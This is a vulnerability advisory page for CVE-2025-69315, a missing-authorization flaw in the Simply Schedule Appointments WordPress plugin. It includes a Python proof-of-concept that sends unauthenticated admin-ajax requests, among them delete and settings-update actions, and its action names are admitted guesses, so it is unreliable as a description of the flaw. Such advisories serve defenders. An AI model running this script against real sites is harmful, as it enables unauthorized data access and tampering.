Security Vulnerability Report
中文
CVE-2025-69315 CVSS 6.5 MEDIUM

CVE-2025-69315

Published: 2026-01-22 17:16:27
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in NSquared Simply Schedule Appointments simply-schedule-appointments allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simply Schedule Appointments: from n/a through <= 1.6.9.15.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Simply Schedule Appointments <= 1.6.9.15 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-69315 PoC - Missing Authorization in Simply Schedule Appointments # Target: WordPress site with Simply Schedule Appointments plugin <= 1.6.9.15 target_url = "http://target-wordpress-site.com" # Identify vulnerable endpoints - typically AJAX actions without proper auth checks vulnerable_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/wp/v2/", ] # Common vulnerable actions in Simply Schedule Appointments vulnerable_actions = [ "ssa_get_appointments", "ssa_manage_appointment", "ssa_delete_appointment", "ssa_update_settings", "ssa_get_availability", ] def check_vulnerability(): """Check if the target is vulnerable to CVE-2025-69315""" for endpoint in vulnerable_endpoints: for action in vulnerable_actions: # Send unauthenticated request to vulnerable endpoint data = { "action": action, # Add common parameters that might expose data "id": "1", } try: response = requests.post( f"{target_url}{endpoint}", data=data, timeout=10 ) # Check if response indicates successful unauthorized access if response.status_code == 200: # Check for sensitive data exposure if "appointment" in response.text.lower() or "user" in response.text.lower(): print(f"[+] Potential vulnerability found at {endpoint} with action {action}") print(f"[+] Response preview: {response.text[:500]}") return True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") return False if __name__ == "__main__": print("CVE-2025-69315 Vulnerability Checker") print("Target:", target_url) check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69315", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:27.210", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in NSquared Simply Schedule Appointments simply-schedule-appointments allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simply Schedule Appointments: from n/a through <= 1.6.9.15."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en NSquared Simply Schedule Appointments simply-schedule-appointments permite explotar niveles de seguridad de control de acceso incorrectamente configurados. Este problema afecta a Simply Schedule Appointments: desde n/a hasta &lt;= 1.6.9.15."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/simply-schedule-appointments/vulnerability/wordpress-simply-schedule-appointments-plugin-1-6-9-15-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}